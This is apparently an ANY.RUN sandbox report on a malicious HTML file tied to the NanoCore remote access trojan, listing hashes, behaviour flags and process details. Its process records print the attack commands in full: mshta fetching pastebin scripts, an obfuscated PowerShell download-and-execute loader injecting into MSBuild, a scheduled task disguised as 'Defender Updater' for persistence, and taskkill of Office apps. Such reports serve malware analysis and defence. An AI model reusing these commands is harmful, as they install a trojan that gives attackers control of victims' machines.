General Info

File name

8.html

Full analysis
https://app.any.run/tasks/1ca27cb5-dc96-4f73-b460-3dab8cd87684
Verdict
Malicious activity
Analysis date
7/11/2019, 16:16:07
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

rat

nanocore

Indicators:

MIME:
text/html
File info:
HTML document, ASCII text, with very long lines
MD5

6e9c135a194306432c54952a5eda2a6e

SHA1

38d91d48f050f925cb33f8a259cbfb15eafc89c3

SHA256

1649d105a7a5c3ad68a16d1bd6c21b36e30273a3b9f7fc25e9747d31ef98de85

SSDEEP

768:7+3eyHHvPWdoV20rOwHBgFhoCiote2SeAIk:7+3LHH2dw20r3HBjCiotdk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evasion option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x86 en-US) (67.0.4)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Application was dropped or rewritten from another process
  • MSBuild.exe (PID: 2104)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 4060)
Changes the autorun value in the registry
  • MSBuild.exe (PID: 2104)
  • mshta.exe (PID: 2632)
NanoCore was detected
  • MSBuild.exe (PID: 2104)
Executes PowerShell scripts
  • mshta.exe (PID: 2632)
Uses Task Scheduler to run other applications
  • mshta.exe (PID: 2632)
Uses TASKKILL.EXE to kill process
  • cmd.exe (PID: 3416)
Creates files in the user directory
  • powershell.exe (PID: 3720)
  • MSBuild.exe (PID: 2104)
  • mshta.exe (PID: 2632)
  • mshta.exe (PID: 3952)
Executable content was dropped or overwritten
  • MSBuild.exe (PID: 2104)
Uses TASKKILL.EXE to kill Office Apps
  • cmd.exe (PID: 3416)
Starts CMD.EXE for commands execution
  • mshta.exe (PID: 2632)
Starts MSHTA.EXE for opening HTA or HTMLS files
  • mshta.exe (PID: 3952)
Application launched itself
  • mshta.exe (PID: 3952)
Reads internet explorer settings
  • mshta.exe (PID: 2632)
  • mshta.exe (PID: 3952)

Static information

TRiD
.html
|   HyperText Markup Language (100%)
EXIF
HTML
viewport:
width=1100
ContentType:
text/html; charset=UTF-8
Generator:
blogger
Rating:
adult
Title:
.: 8 thomas 7.10

Processes

Total processes
51
Monitored processes
10
Malicious processes
4
Suspicious processes
1

Behavior graph

Process chain (start to finish):

  • mshta.exe
  • mshta.exe
  • cmd.exe (no specs)
  • powershell.exe
  • schtasks.exe (no specs)
  • taskkill.exe (no specs)
  • taskkill.exe (no specs)
  • taskkill.exe (no specs)
  • taskkill.exe (no specs)
  • msbuild.exe (#NANOCORE)

Process information

PID
3952
CMD
"C:\Windows\System32\mshta.exe" https://asdadwnixwed.blogspot.com/p/8.html
Path
C:\Windows\System32\mshta.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\wship6.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\jscript.dll
c:\program files\common files\microsoft shared\vgx\vgx.dll
c:\windows\system32\atl.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mlang.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\inetcpl.cpl

PID
2632
CMD
"C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/LhpqPv66
Path
C:\Windows\System32\mshta.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\wship6.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\jscript.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
3416
CMD
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3720
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,87,87,87,113,49,100,83,49,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,75,121,54,113,118,80,87,103,39,41,46,114,101,112,108,97,99,101,40,39,42,42,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEX
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
c:\windows\system32\netutils.dll

PID
4060
CMD
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Defender Updater" /tr "mshta.exe http://pastebin.com/raw/b9u9sm5U" /F
Path
C:\Windows\System32\schtasks.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
1144
CMD
taskkill /f /im winword.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3444
CMD
taskkill /f /im excel.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3328
CMD
taskkill /f /im MSPUB.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3508
CMD
taskkill /f /im POWERPNT.EXE
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
